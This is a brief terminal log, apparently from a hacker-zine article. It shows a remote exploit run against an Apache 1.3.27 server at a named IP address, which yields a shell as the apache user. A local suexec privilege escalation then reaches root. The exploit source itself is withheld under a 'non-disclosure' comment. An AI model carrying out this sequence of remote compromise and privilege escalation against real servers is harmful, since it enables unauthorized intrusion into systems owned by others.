evil:~# ./a.out -v64.202.97.154 -p80 -o12 -t6
Attacking 64.202.97.154:80 - Apache 1.3.27
progress[#######]
Linux irc.scservers.com 2.4.1-008stab043.15.swsoft-smp #1 SMP Thu Mar 20 16:47:30 MSK 2003 i686 unknown
uid=48(apache) gid=48(apache) groups=48(apache),500(webadmin)
id pr0ix
uid=512(pr0ix) gid=512(pr0ix) groups=512(pr0ix)
#hohoho time for more skillz
whereis suexec
suexec: /usr/sbin/suexec /usr/share/man/man8/suexec.8.gz
ls -al /usr/sbin/suexec
-r-s--x--- 1 root apache 11732 May 15 06:09 /usr/sbin/suexec
cat << EOF >> suexp.c
/* REMOVED - sorry kids
* Phrack supports Non-disclosure
*/
EOF
make suexp
cc suexp.c -o suexp
./suexp -t6
id
uid=0(root) gid=0(apache) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(di sk),10(wheel)
#h3h3h3
Lesezeichen